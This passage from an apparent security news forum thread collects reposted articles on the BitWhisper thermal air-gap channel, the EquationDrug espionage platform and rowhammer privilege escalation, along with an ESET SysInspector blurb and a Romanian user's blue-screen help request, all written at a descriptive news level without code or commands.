(about 15 inches) from the other computer the attackers control. But the researchers, at Ben Gurion’s Cyber Security Labs, note that this latter scenario is not uncommon, because air-gapped systems often sit on desktops alongside Internet-connected ones so that workers can easily access both. The method was developed by Mordechai Guri, Gabi Kedma and Assaf Kachlon and overseen by their adviser Yuval Elovici. The research represents just a first step says Dudu Mimran, chief technology officer at the lab, who says they plan to present their findings at a security conference in Tel Aviv next week and release a paper describing their work later on. “We expect this pioneering work to serve as the foundation of subsequent research, which will focus on various aspects of the thermal channel and improve its capabilities,” the researchers note in their paper. With additional research, they say they may be able to increase the distance between the two communicating computers and the speed of data transfer between them. In their video demonstration, they used one computer tower to initiate a command to an adjacent computer tower representing an air-gapped system. But future research might involve using the so-called internet of things as an attack vector—an internet-connected heating and air conditioning system or a fax machine that’s remotely accessible and can be compromised to emit controlled fluctuations in temperature. How It Works Computers produce varying levels of heat depending on how much processing they’re doing. In addition to the CPU, the graphics-processing unit and other motherboard components produce significant heat as well. A system that is simultaneously streaming video, downloading files and surfing the internet will consume a lot of power and generate heat. To monitor the temperature, computers have a number of built-in thermal sensors to detect heat fluctuations and trigger an internal fan to cool the system off when necessary or even shut it down to avoid damage. The attack, which the researchers dubbed BitWhisper, uses these sensors to send commands to an air-gapped system or siphon data from it. The technique works a bit like Morse code, with the transmitting system using controlled increases of heat to communicate with the receiving system, which uses its built-in thermal sensors to then detect the temperature changes and translate them into a binary “1” or “0.” To communicate a binary “1” in their demonstration for example, the researchers increased the heat emissions of the transmitting computer by just 1 degree over a predefined timeframe. Then to transmit a “0” they restored the system to its base temperature for another predefined timeframe. The receiving computer, representing the air-gapped system, then translated this binary code into a command that caused it to reposition the toy missile launcher. The researchers designed their malware to take into consideration normal temperature fluctuations of a computer and distinguish these from fluctuations that signal a system is trying to communicate. And although their malware increased the temperature by just one degree to signal communication, an attacker could increase the temperature by any amount as long as it’s within reason, to avoid creating the suspicion that can accompany an overactive computer fan if the computer overheats. Communication can also be bi-directional with both computers capable of transmitting or receiving commands and data. The same method, for example, could have been used to cause their air-gapped system to communicate a password to the other system. The malware on each system can be designed to search for nearby PCs by instructing an infected system to periodically emit a thermal ping—to determine, for example, when a government employee has placed his infected laptop next to a classified desktop system. The two systems would then engage in a handshake, involving a sequence of “thermal pings” of +1C degrees each, to establish a connection. But in situations where the internet-connected computer and the air-gapped one are in close proximity for an ongoing period, the malware could simply be designed to initiate a data transmission automatically at a specified time—perhaps at midnight when no one’s working to avoid detection—without needing to conduct a handshake each time. The time it take to transmit data from one computer to another depends on several factors, including the distance between the two computers and their position and layout. The researchers experimented with a number of scenarios—with computer towers side-by-side, back-to-back and stacked on top of each other. The time it took them to increase the heat and transmit a “1” varied between three and 20 minutes depending. The time to restore the system to normal temperature and transmit a “0” usually took longer. Other Air-Gap Hacking Techniques This isn’t the only way to communicate with air-gapped systems without using physical media. Past research by other teams has focused on using acoustic inaudible channels, optical channels and electromagnetic emissions. All of these, however, are unidirectional channels, meaning they can be used to siphon data but not send commands to an air-gapped system. The same Ben Gurion researchers previously showed how they could siphon data from an air-gapped machine using radio frequency signals and a nearby mobile phone. That proof-of-concept hack involved radio signals generated and transmitted by an infected machine’s video card, which could be used to send passwords and other data over the air to the FM radio receiver in a mobile phone. The NSA reportedly has been using a more sophisticated version of this technique to not only siphon data from air-gapped machines in Iran and elsewhere but also to inject them with malware, according to documents leaked by Edward Snowden. Using an NSA hardware implant called the Cottonmouth-I, which comes with a tiny embedded transceiver, the agency can extract data from targeted systems using RF signals and transmit it to a briefcase-sized relay station up to 8 miles away. There’s no evidence yet that the spy agency is using heat emissions and thermal sensors to steal data and control air-gapped machines— their RF technique is much more efficient than thermal hacking. But if university researchers in Israel have explored the idea of thermal hacking as an attack vector, the NSA has likely considered it too. Source
  22. Free PC Diagnostics Tool ESET SysInspector is an easy to use diagnostic tool that helps troubleshoot a wide range of system issues. Coming either as a free, standalone application, as well as, integrated into ESET NOD32 Antivirus and ESET Smart Security, it captures critical and detailed information about your computer. Solve Problems While best used to track down the presence of malicious code, ESET SysInspector also comes in handy when resolving issues related to: Running processes and services Presence of suspicious and unsigned files Software issues Hardware incompatibility Outdated or malfunctioning drivers An unpatched operating system Broken registry entries Suspicious network connections Easily Identify Problems ESET SysInspector assigns each entry a color-coded risk level. Simply move the slider to filter out the most severe issues you want to prioritize. Additionally, the "Compare Logs" functionality allows you to keep track of system modifications simplifying the process of identifying potential problems. System requirements Operating Systems: Windows 8/7/Vista/XP/2000, Windows Server 2012/2008R2/2008/2003/2000 Processor Architecture: i386 (Intel®80386), amd64 (x86-64) Memory: 38 MB More Information For more information please consult the following pages: ESET SysInspector Frequently Asked Questions ESET SysInspector Changelog Link: ESET :: SysInspector :: Free PC Diagnostic Tool
  23. Salutare, M? joc 10-15 minute, m? uit la film 10-15 minute ?i mi se d? restart la calculator, dar înainte s? se dea restart la calculator se aude "bzzzzzzzzzzzzz" dup? se d?. Când se deschide calculatorul primesc notificare ca bluescreen. De la ce ar putea fi, l-am dus de vreo 4-5 ori la reparat ?i mi-au spus c? nu are nici o problem? calculatorul. * Uneori mi se d? restart, alteori nu mi se d?... ** Eroare când se deschide pc-ul: Problem signature: Problem Event Name: BlueScreen OS Version: 6.1.7601.2.1.0.256.1 Locale ID: 1033 Additional information about the problem: BCCode: 116 BCP1: FFFFFA8009E5F4E0 BCP2: FFFFF8800FA3D7A0 BCP3: FFFFFFFFC000009A BCP4: 0000000000000004 OS Version: 6_1_7601 Service Pack: 1_0 Product: 256_1 Files that help describe the problem: C:\Windows\Minidump\030815-31715-01.dmp C:\Users\x\AppData\Local\Temp\WER-161570-0.sysdata.xml Read our privacy statement online: http://go.microsoft.com/fwlink/?linkid=104288&clcid=0x0409 If the online privacy statement is not available, please read our privacy statement offline: C:\Windows\system32\en-US\erofflps.txt Câteva informa?ii ale calculatorului meu, poate v? ajut? cu ceva... Procesor: Intel® Core™ i3-3250 CPU @ 3.50GHz (4CPUs), ~3.5GHz RAM: 8.00 GB System type: 64-bit Operating System Operatin System: Windows 7 Ultimate 64-bit (6.1, Build 7601) Card name: NVIDIA GeForce GT 630
  24. Kaspersky malware probers have uncovered a new 'operating system'-like platform that was developed and used by the National Security Agency (NSA) in its Equation spying arsenal. The EquationDrug or Equestre platform is used to deploy 116 modules to target computers that can siphon data and spy on victims. "It's important to note that EquationDrug is not just a trojan, but a full espionage platform, which includes a framework for conducting cyberespionage activities by deploying specific modules on the machines of selected victims," Kaspersky researchers say in a report. "Other threat actors known to use such sophisticated platforms include Regin and Epic Turla. "The architecture of the whole framework resembles a mini-operating system with kernel-mode and user-mode components carefully interacting with each other via a custom message-passing interface." The platform is part of the NSA's possibly ongoing campaign to infect hard disk firmware. It replaces the older EquationLaser and is itself superseded by the GrayFish platform. Kaspersky says the newly-identified wares are as "sophisticated as a space station" thanks to the sheer number of included espionage tools. Extra modules can be added through a custom encrypted file system containing dozens of executables that together baffle most security bods. Most of the unique identifiers and codenames tied to modules is encrypted and obfuscated. Some modules capabilities can be determined with unique identification numbers. Others are dependent on other plugins to function. Each plugin has a unique ID and version number that defines a set of functions it can provide. Some of the plugins depend on others and might not work unless dependencies are resolved. Kaspersky bods have found 30 of the 116 modules estimated to exist. "The plugins we discovered probably represent just a fraction of the attackers' potential," the researchers say. Executable timestamps reveal NSA developers likely work hardest on the platform on Tuesdays to Fridays, perhaps having late starts to Monday. Modules detected in the tool include code for: Network traffic interception for stealing or re-routing Reverse DNS resolution (DNS PTR records) Computer management Start/stop processes Load drivers and libraries Manage files and directories System information gathering OS version detection Computer name detection User name detection Locale detection Keyboard layout detection Timezone detection Process list Browsing network resources and enumerating and accessing shares WMI information gathering Collection of cached passwords Enumeration of processes and other system objects Monitoring LIVE user activity in web browsers Low-level NTFS filesystem access based on the popular Sleuthkit framework Monitoring removable storage drives Passive network backdoor (runs Equation shellcode from raw traffic) HDD and SSD firmware manipulation Keylogging and clipboard monitoring Browser history, cached passwords and form auto-fill data collection. Source
  25. In one of more impressive hacks in recent memory, researchers have devised an attack that exploits physical weaknesses in certain types of DDR memory chips to elevate the system rights of untrusted users of Intel-compatible PCs running Linux. The technique, outlined in a blog post published Monday by Google's Project Zero security initiative, works by reversing individual bits of data stored in DDR3 chip modules known as DIMMs. Last year, scientists proved that such "bit flipping" could be accomplished by repeatedly accessing small regions of memory, a feat that—like a magician who transforms a horse into a rabbit—allowed them to change the value of contents stored in computer memory. The research unveiled Monday showed how to fold such bit flipping into an actual attack. "The thing that is really impressive to me in what we see here is in some sense an analog- and manufacturing-related bug that is potentially exploitable in software," David Kanter, senior editor of the Microprocessor Report, told Ars. "This is reaching down into the underlying physics of the hardware, which from my standpoint is cool to see. In essence, the exploit is jumping several layers of the stack." Getting hammered DDR memory is laid out in an array of rows and columns, which are assigned in large blocks to various applications and operating system resources. To protect the integrity and security of the entire system, each large chunk of memory is contained in a "sandbox" that can be accessed only by a given app or OS process. Bit flipping works when a hacker-developed app or process accesses two carefully selected rows of memory hundreds of thousands of times in a tiny fraction of a second. By hammering the two "aggressor" memory regions, the exploit can reverse one or more bits in a third "victim" location. In other words, selected zeros in the victim region will turn into ones or vice versa. The ability to alter the contents of forbidden memory regions has far-reaching consequences. It can allow a user or application who has extremely limited system privileges to gain unfettered administrative control. From there, a hacker may be able to execute malicious code or hijack the operations of other users or software programs. Such elevation-of-privilege hacks are especially potent on servers available in data centers that are available to multiple customers. The vulnerability works only on newer types of DDR3 memory and is the result of the ever smaller dimensions of the silicon. With less space between each DRAM cell, it becomes increasingly hard to prevent one cell from interacting electrically with its neighbors. By repeatedly accessing one or more carefully selected memory locations, attackers can exploit this volatility, causing the charge to leak into or out of adjacent cells. With enough accesses, the technique can change the value of a cell. The attack doesn't work against newer DDR4 silicon or DIMMs that contain ECC, short for error correcting code, capabilities. Mark Seaborn, described as a "sandbox builder and breaker," along with reverse engineer Thomas Dullien, developed two "rowhammer" exploits that, when run as unprivileged processes, were able to gain kernel privileges on an x86-64 Linux system. The first exploit ran as a Native Client module on top of Google Chrome. Once Google developers became aware of the exploit, they disallowed the CLFLUSH instruction that's required to make the exploit work. The second exploit, which ran as a normal Linux process and gained access to all physical memory, will be harder to mitigate on existing machines. There are other things that made the exploits impressive. Irene Abezgauz, a product VP at Dyadic Security and an experienced penetration testing professional, told Ars: The attackers didn't identify the specific models of DDR3 that are susceptible to the attack. While their proof-of-concept exploits targeted a Linux computer running x86-64 hardware, the same technique would likely work against a variety of platforms. The results are impressive, but for a variety of reasons right now, the attacks appear to be more theoretical than practical. For one, the attack appears to allow only local, rather than remote, exploitation, a limitation that significantly curtails its appeal to real-world hackers. And for another, bit flipping works only against certain pre-determined rows. What's more, rowhammering requires more than 540,000 memory accesses in just 64 milliseconds. Unless refinements are made, the demands could make it impractical for attackers to use the technique to reliably hijack a system. Bit flipping shouldn't be mistaken as a class of memory corruption exploit, such as a buffer overflow or a use-after-free, both of which allow attackers to funnel malicious shell code into protected regions of a computer. Rowhammering, by contrast, allows for escalation of privileges, which while serious, is a much more nuanced type of incursion. Rob Graham, CEO of Errata Security, published this blog post that details additional challenges and technical details. Still, the ability to exploit physical weaknesses in the hardware is a highly novel type of attack that breaks new ground and may not be easy to remedy. "This is not like software, where in theory we can go patch the software and get a patch distributed via Windows update within the next two to three weeks," Kanter, of the Microprocessor Report, said. "If you want to actually fix this problem, we need to go out and replace, on a DIMM by DIMM basis, billions of dollars' worth of DRAM. From a practical standpoint that's not ever going to happen." Source
×
×
  • Create New...